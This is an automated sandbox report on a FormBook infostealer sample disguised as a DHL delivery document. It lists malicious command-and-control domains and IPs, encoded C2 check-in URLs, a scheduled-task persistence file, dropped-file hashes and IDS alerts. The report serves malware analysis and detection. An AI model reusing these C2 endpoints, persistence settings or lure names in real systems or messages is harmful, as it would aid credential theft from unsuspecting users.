https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.214.17 | www.alexbruma.com | United States | 13335 | CLOUDFLARENETUS | false
103.48.135.8 | www.uzonedich.com | Hong Kong | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446732
Start date and time: 2024-05-23 20:26:54 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL_Delivery Documents.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/16@7/2
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 121
• Number of non-executed functions: 315
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target OoIHIwIlaOHZFTFWeSHYCjEJ.exe, PID 6460 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: DHL_Delivery Documents.exe
Time | Type | Description
14:27:44 | API Interceptor | 1x Sleep call for process: DHL_Delivery Documents.exe modified
14:27:47 | API Interceptor | 62x Sleep call for process: powershell.exe modified
14:27:52 | API Interceptor | 1x Sleep call for process: YybGLWQSx.exe modified
14:29:20 | API Interceptor | 46x Sleep call for process: setx.exe modified
20:27:49 | Task Scheduler | Run new task: YybGLWQSx path: C:\Users\user\AppData\Roaming\YybGLWQSx.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.214.17 | purchase list.exe | malicious | FormBook
• www.alexbruma.com/0m8b/
172.67.214.17 | vi3VzdBK4R.exe | malicious | FormBook
• www.alexbruma.com/mg0g/?H6e0=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfGWVetp6XhB200JQ==&nBN=u8MPgxf
172.67.214.17 | AWB_doc....exe | malicious | FormBook
• www.alexbruma.com/s6sf/?zj=oZPW66qys/L3lzC8hpDr2IDUkOMkd7CWz/4gMASGPBshx+mEukL9f9nucg4I2FAaIQJF7ODFUU4ygmilgfYhcA8EhXnvZwEh9g==&BHBl=RL1h7LzxfTPX
172.67.214.17 | CV.doc | malicious | FormBook
• www.alexbruma.com/mg0g/?G2=TZtAOU2zJBKbLgvHv06radoliSp/pM7DPKw5qNaDLWK8osbI5ENSukyfV0auBUHllKHlpSsKBSD+iUCyfiSnY1mmmvLkXlFHV0J7QHE=&dz=ovClIV4H5
172.67.214.17 | GdqrlAmE3T.exe | malicious | FormBook
• www.alexbruma.com/mg0g/?svR=k4YlqJ20X2XXs&wPJpe=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfGY1fjt6H8DEc0DR4MOj4TPbUO
172.67.214.17 | AWB_file.exe | malicious | FormBook
• www.alexbruma.com/s6sf/?T4sdypiP=oZPW66qys/L3lzC9uJCOxPeMgMZfa82Wz/4gMASGPBshx+mEukL9f9nucg4I2FAaIQJF7ODFUU4ygmilgfYhcCJDsGnvZwE96Q==&jzThX=arNh8r3HEB
172.67.214.17 | 5lFjzZyN2w.exe | malicious | FormBook
• www.alexbruma.com/mg0g/?Xjt8=_60hC640JhqT&xhWt=TZtAOU2zJBKbLgvHv1KBdd4lsyJ6qs7DPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfFDCDmtMCcDVIRIA==
172.67.214.17 | Advice_Ref[GLV626201911].exe | malicious | FormBook
• www.alexbruma.com/mg0g/?KPZ=10rTHdQ0Yh0&r4RTrBU=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfFDA2mwP6cDVJOLw==
172.67.214.17 | Ss13V8H048.exe | malicious | FormBook
• www.alexbruma.com/mg0g/?4Vz=Tfmd&eZStEN=TZtAOU2zJBKbLgvHv1KBdd4lsyJ6qs7DPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfFDCDmtMCcDVIRIA==
172.67.214.17 | PRICE_LIST_FOR_NEW_QUOTE.EXE.exe | malicious | FormBook
• www.alexbruma.com/mg0g/?9bDl=HleH_lsx-tgD&-Xctj=TZtAOU2zJBKbLgvE31Lcbs4Eo3wL9fTDPKw5qNaDLWK8osbI5ENSognOQFqpGWvli6GRjykTFTPiykSEfCfGWVetp6XhB200JQ==
103.48.135.8 | AWB...exe | malicious | FormBook
• www.uzonedich.com/s6sf/?8vAla4Nh=LvF9VdN02DoWyKfOfx3dSOe8aODto9eoDEuEsV2RbL1HgzvB1W2t9FZ1Hem1bbCwYpOQFrg3sTYMGTUkpNmQQFL7TTltSk2lCQ==&ob6xa=aH-HdpTPDfuDKZ7
103.48.135.8 | AWB_doc....exe | malicious | FormBook
• www.uzonedich.com/s6sf/?zj=LvF9VdN02DoWyKfOfx3dSOe8aODto9eoDEuEsV2RbL1HgzvB1W2t9FZ1Hem1bbCwYpOQFrg3sTYMGTUkpNmQQFL7TTltSk2lCQ==&BHBl=RL1h7LzxfTPX
103.48.135.8 | AWB_file.exe | malicious | FormBook
• www.uzonedich.com/s6sf/?T4sdypiP=LvF9VdN02DoWyKfPQR24VJDkeMWWv6qoDEuEsV2RbL1HgzvB1W2t9FZ1Hem1bbCwYpOQFrg3sTYMGTUkpNmQQH+8eCltSk25Fg==&jzThX=arNh8r3HEB
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.uzonedich.com | AWB...exe | malicious | FormBook
• 103.48.135.8
www.uzonedich.com | AWB_doc....exe | malicious | FormBook
• 103.48.135.8
www.uzonedich.com | AWB_doc_.exe | malicious | FormBook
• 156.251.239.100
www.uzonedich.com | AWB_file.exe | malicious | FormBook
• 103.48.135.8
www.alexbruma.com | purchase list.exe | malicious | FormBook
• 172.67.214.17
www.alexbruma.com | vi3VzdBK4R.exe | malicious | FormBook
• 172.67.214.17
www.alexbruma.com | AWB...exe | malicious | FormBook
• 104.21.77.252
www.alexbruma.com | AWB_doc....exe | malicious | FormBook
• 172.67.214.17
www.alexbruma.com | CV.doc | malicious | FormBook
• 172.67.214.17
www.alexbruma.com | BvUGO4AmpJ.exe | malicious | FormBook
• 104.21.77.252
www.alexbruma.com | GdqrlAmE3T.exe | malicious | FormBook
• 172.67.214.17
www.alexbruma.com | Tr71jqZGPq.exe | malicious | FormBook
• 104.21.77.252
www.alexbruma.com | DZJQM6oXkJ.exe | malicious | FormBook
• 104.21.77.252
www.alexbruma.com | AWB_file.exe | malicious | FormBook
• 172.67.214.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | LHER000698175.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | PO 4500025813.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | hesaphareketi-.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | Home Purchase Contract and Property Details.xls | malicious | Remcos, DBatLoader | 188.114.96.3
CLOUDFLARENETUS | Documents Of DHL -BL- AWB- 8976453410.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | Offer Document 24.lnk | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | PO 4500025813.xls | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | https://freexxxth.link | malicious | Unknown | 104.21.25.77
CLOUDFLARENETUS | https://freexxxth.link | malicious | Unknown | 172.67.223.248
CLOUDFLARENETUS | SCB REmittance Advice.doc | malicious | Lokibot | 188.114.97.9
XIAOZHIYUN1-AS-APICIDCNETWORKUS | gm7Kudjyws.elf | malicious | Gafgyt | 156.226.218.136
XIAOZHIYUN1-AS-APICIDCNETWORKUS | byKLI4nzv2.elf | malicious | Mirai | 156.234.199.238
XIAOZHIYUN1-AS-APICIDCNETWORKUS | VxrYNgC0xs.elf | malicious | Mirai | 156.226.185.165
XIAOZHIYUN1-AS-APICIDCNETWORKUS | dwn1cGHIbV.elf | malicious | Mirai | 156.234.199.249
XIAOZHIYUN1-AS-APICIDCNETWORKUS | SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exe | malicious | Unknown | 23.248.236.58
XIAOZHIYUN1-AS-APICIDCNETWORKUS | SecuriteInfo.com.FileRepMalware.20155.16240.elf | malicious | Gafgyt, Mirai | 156.226.225.200
XIAOZHIYUN1-AS-APICIDCNETWORKUS | bPOGt24Mub.elf | malicious | Mirai | 156.241.35.34
XIAOZHIYUN1-AS-APICIDCNETWORKUS | kl7nWo7u71.elf | malicious | Gafgyt, Mirai | 156.241.60.186
XIAOZHIYUN1-AS-APICIDCNETWORKUS | OPs5j7Yjb8.elf | malicious | Gafgyt, Mirai | 156.254.239.8
XIAOZHIYUN1-AS-APICIDCNETWORKUS | GjWh3Nar5c.elf | malicious | Gafgyt, Mirai | 156.253.103.137
No context
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.380747059108785
                      Encrypted:false
                      SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                      MD5:4D3B8C97355CF67072ABECB12613F72B
                      SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                      SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                      SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
The same 60-byte file (identical size and hashes) was dropped seven more times by powershell.exe; the repeated records are omitted here. It is a benign artifact of PowerShell start-up, written to test whether AppLocker or WDAC enforces constrained language mode, not attacker-controlled content.
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1582
                      Entropy (8bit):5.111419215021226
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7+xvn:cgergYrFdOFzOzN33ODOiDdKrsuT7yv
                      MD5:6338C1D0E376D49F07488439897B7436
                      SHA1:8FDC6694A1A6305DB3A67E50B4555653B2409392
                      SHA-256:47463889132D6CC2331820FCF92DA614624FF1D4CD8008DC0CC583AA0755C3DC
                      SHA-512:BC49F301B7014A69CC4AD22C650BCD2BBEA096FA2781F0C2BFA99AFD0CEBC58B3AF83FE662A91856D43CB1B525FFEEEDC668B0D15B7C92FED1F8BF5164C12625
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1582
                      Entropy (8bit):5.111419215021226
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt7+xvn:cgergYrFdOFzOzN33ODOiDdKrsuT7yv
                      MD5:6338C1D0E376D49F07488439897B7436
                      SHA1:8FDC6694A1A6305DB3A67E50B4555653B2409392
                      SHA-256:47463889132D6CC2331820FCF92DA614624FF1D4CD8008DC0CC583AA0755C3DC
                      SHA-512:BC49F301B7014A69CC4AD22C650BCD2BBEA096FA2781F0C2BFA99AFD0CEBC58B3AF83FE662A91856D43CB1B525FFEEEDC668B0D15B7C92FED1F8BF5164C12625
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Windows\SysWOW64\setx.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):939520
                      Entropy (8bit):7.030426163836173
                      Encrypted:false
                      SSDEEP:12288:T83vsUudRAh+fPkiqchEjXHHfYlFajGI8+xKGDPm2c4i1Sp+LrJ26AQ8:T8/kAhGhEj3wlFa6wxTCD4iDL43l
                      MD5:9C930DA2AC186C1F945A7BC74AA491ED
                      SHA1:3B24459060AB8590B7C550D34BD0243CBADE3E2A
                      SHA-256:25BBD4A45D4D02D8BACDF482696505AB302AD8591B5E06DA57481F7098324F9E
                      SHA-512:99C5621F5BB2FD33F780D956D46AB4C61E179AA489FE58F97BC91371E4270EE7676C671C45CB681197CA4C5B17F0B875DD269170E4EF12F4798F1A6BD31FE91C
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 55%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..L...........j... ........@.. ....................................@..................................j..O....................................N..p............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B.................j......H........e...............Y...............................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                      Process:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:false
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.030426163836173
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:DHL_Delivery Documents.exe
                      File size:939'520 bytes
                      MD5:9c930da2ac186c1f945a7bc74aa491ed
                      SHA1:3b24459060ab8590b7c550d34bd0243cbade3e2a
                      SHA256:25bbd4a45d4d02d8bacdf482696505ab302ad8591b5e06da57481f7098324f9e
                      SHA512:99c5621f5bb2fd33f780d956d46ab4c61e179aa489fe58f97bc91371e4270ee7676c671c45cb681197ca4c5b17f0b875dd269170e4ef12f4798f1a6bd31fe91c
                      SSDEEP:12288:T83vsUudRAh+fPkiqchEjXHHfYlFajGI8+xKGDPm2c4i1Sp+LrJ26AQ8:T8/kAhGhEj3wlFa6wxTCD4iDL43l
                      TLSH:B6159E3D18F922E29164C6A8CFE0C627B410F8EA31936935A9D24B55574BE0FBDC327D
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..L...........j... ........@.. ....................................@................................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x4e6ade
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0xDBE1BAC7 [Sun Nov 24 19:15:19 2086 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]    ; 0x402000 = ImageBase 0x400000 + IAT RVA 0x2000; the IAT's single entry is mscoree.dll!_CorExeMain, so the native entry point only hands control to the CLR, as in any .NET executable
add byte ptr [eax], al       ; repeated 97 times: the bytes after the jmp stub are zero padding, which the disassembler decodes as add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe6a89 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe8000 | 0x5c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xea000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe4e90 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe4ae4 | 0xe4c00 | d2b9113fe8a27c6162cda83369800543 | False | 0.7176176144125683 | data | 7.036454178640072 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe8000 | 0x5c4 | 0x600 | a72fc84a37b831c10f56340ad308c6bd | False | 0.423828125 | data | 4.117955892303824 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xea000 | 0xc | 0x200 | 3c3ff6f7bc535a2fc5b599e7379c44ed | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe8090 | 0x334 | data | | | 0.42317073170731706
RT_MANIFEST | 0xe83d4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/23/24-20:29:06.154524 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49710 | 80 | 192.168.2.5 | 103.48.135.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 20:29:06.142535925 CEST | 49710 | 80 | 192.168.2.5 | 103.48.135.8
May 23, 2024 20:29:06.149619102 CEST | 80 | 49710 | 103.48.135.8 | 192.168.2.5
May 23, 2024 20:29:06.149727106 CEST | 49710 | 80 | 192.168.2.5 | 103.48.135.8
May 23, 2024 20:29:06.154524088 CEST | 49710 | 80 | 192.168.2.5 | 103.48.135.8
May 23, 2024 20:29:06.209666014 CEST | 80 | 49710 | 103.48.135.8 | 192.168.2.5
May 23, 2024 20:29:07.014317036 CEST | 80 | 49710 | 103.48.135.8 | 192.168.2.5
May 23, 2024 20:29:07.019054890 CEST | 80 | 49710 | 103.48.135.8 | 192.168.2.5
